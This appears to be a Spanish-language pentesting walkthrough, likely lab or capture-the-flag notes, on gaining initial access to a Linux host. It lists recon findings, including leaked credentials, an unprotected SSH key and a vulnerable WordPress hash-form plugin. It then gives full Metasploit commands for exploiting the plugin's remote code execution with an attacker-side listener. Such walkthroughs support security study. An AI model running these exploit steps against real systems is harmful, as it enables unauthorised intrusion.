Linux Initial Access - Métodos de Acceso Inicial en Sistemas Linux

🧩 Información previa recopilada

Antes de iniciar la explotación, analizamos los datos obtenidos 🕵️‍♂️:

Elemento Descripción Riesgo
🔓 FTP anónimo (puerto 21) Acceso libre, contenido del usuario john 🔴 Alto
🏠 Directorio /home/john/ Archivos de configuración y credenciales 🟠 Medio
🧾 .bash_history Revela credenciales → john:SuperSecurePass123 🔴 Alto
🔐 Clave privada SSH (id_rsa) Sin contraseña de protección 🔴 Alto
📰 WordPress_Blog_Setup_Update.txt Contiene configuración temporal de FTP 🟡 Bajo
🌐 WordPress Plugin vulnerable hash-form v1.1.0 (RCE) 🔴 Crítico

💡 Objetivo: comprobar si la información hallada nos permite obtener acceso al sistema.

🚀 Métodos posibles de acceso inicial

  1. 💣 Explotar el plugin de WordPress (vía Metasploit)

  2. 🔐 Acceso SSH mediante clave privada (id_rsa)

  3. 🧑‍💻 Acceso SSH con credenciales válidas (john:SuperSecurePass123)


⚙️ 1️⃣ Explotación del plugin de WordPress

🧰 Configuración del módulo en Metasploit

msfconsole -q
search wordpress hash form
use exploit/multi/http/wp_hash_form_rce
info exploit/multi/http/wp_hash_form_rce
use 0
msf6 exploit(multi/http/wp_hash_form_rce) > options

📋 Configuramos los parámetros necesarios:

set RHOSTS <Ip_objetivo>
set LHOST <ip_atacante>
set ssl true
set rport 443
set AutoCheck false
run

📈 Salida esperada:
{61482EA7-CF80-4C7C-86D3-6BCF7D74B0F8}.png